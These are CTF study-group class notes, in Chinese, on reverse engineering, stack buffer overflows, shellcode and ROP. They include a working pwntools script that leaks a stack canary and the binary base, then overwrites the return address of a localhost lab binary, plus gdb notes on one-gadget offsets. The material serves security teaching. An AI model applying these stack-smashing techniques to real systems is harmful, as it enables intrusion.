NCtfU - 3/18(r8)

# NCtfU - 3/18(r8) ###### tags: `nctfu2022spring` ## 開始時間 - PM 8:10 ## youtube link https://youtu.be/6H5QhGndg7I (需要請聯繫 r8) ## 會參加 - idisused - sixkwnp - ppodds - Mark - le37 ## 講者筆記 [NCtfU - 3/11(r8) - HackMD](https://hackmd.io/xiPPIRpHSZyTBcMQeovGCA) 環境有更新，因此需要重新 build dockerfile ``` 安裝 pwn 工具懶人包 https://github.com/r888800009/CTF-tool/tree/master/pwn_docker ``` ~~[簡報](https://drive.google.com/file/d/16bRddadTbktnRE9aKaCvFzSvjvRDwR6P/view?usp=sharing)~~ [[修正版]簡報](https://drive.google.com/file/d/1BvtyFUjeoKrPTln8YIGsqhL8_P4iDjbe/view?usp=sharing) (需要請聯繫 r8) ### outline - Get started with reverse engineering - Stack-based Buffer Overflows (Stack Smashing) - Shellcode - Return-Oriented Programming (ROP) [回饋表單](https://docs.google.com/forms/d/e/1FAIpQLSfIw0OI3H26h6OtiP6zd9fU8l5QXyUOPqUA0QRd2O2RGHfqLQ/viewform) ## 共筆 ### LAB (15 minutes) Patch and struct reversing [rbp-8] + 18h stack 上的位置吧所以指向 struct 的 pointer 放在 stack 上 rbp - 8 的位置 pointer 指向 heap id 在 heap 上 struct 的 offset +24 的地方 ![](https://i.imgur.com/yo2osRp.png) ### LAB baby-bof  ```python= from pwn import * #con=process("./baby-bof") con=remote("localhost",30001) elf=ELF("./baby-bof") con.recvuntil(")\n") canary=int(con.recvline().split(b": ")[1][:-1],16) # 1: is canary con.recvline() elf.address=int(con.recvline().split(b": ")[1][:-1],16)-0x131c # 3: -0x131c = elfbase log.info("canary: "+hex(canary)) log.info("elf base: "+hex(elf.address)) log.info("shell: "+hex(elf.symbols["shellcode"])) con.sendlineafter(b"bof: ",b"A"*8+p64(canary)+b"B"*8+p64(elf.symbols["shellcode"])) con.interactive() ``` ### LAB ret2sc ### LAB One-gadget ![](https://i.imgur.com/S9kQ1OT.png) ``` gef➤ p 0x00007ffff7df30b3-0x00007ffff7dcf000 $2 = 0x240b3 ``` > 我的libc 載入位置好像不太一樣 - 應該就是沒有開 docker